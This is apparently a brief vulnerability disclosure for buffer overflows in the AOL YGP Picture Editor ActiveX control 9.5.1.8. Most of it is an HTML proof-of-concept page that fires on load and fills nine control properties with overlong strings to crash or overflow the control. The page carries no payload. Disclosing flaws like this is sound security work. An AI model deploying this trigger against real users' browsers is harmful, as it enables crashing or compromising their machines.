The AOL YGP Picture Editor Control (AIM PicEditor Control) version 9.5.1.8 suffers from multiple exploitable buffer overflows in various properties.
0c1692d9f65fb76aec4d13d1b0a6c47c249eddbb97243c5343e54c6ab22d4ab9
The AOL YGP Picture Editor Control(AIM PicEditor Control) version 9.5.1.8 suffers from multiple exploitable buffer overflows in various properties. This object is marked safe for scripting. I have not tested other versions. PoC as follows:
----------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = 'A';
while (s.length <= 8175) s = s + 'A';
obj.DisplayName = s;
obj.DisplayName = s;
obj.FinalSavePath = s;
obj.ForceSaveTo = s;
obj.HiddenControls = s;
obj.InitialEditorScreen = s;
obj.Locale = s;
obj.Proxy = s;
obj.UserAgent = s;
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:085891E5-ED86-425F-8522-C10290FA8309">
</object>
</body>
</html>
----------------
Happy Holidays to all!
Elazar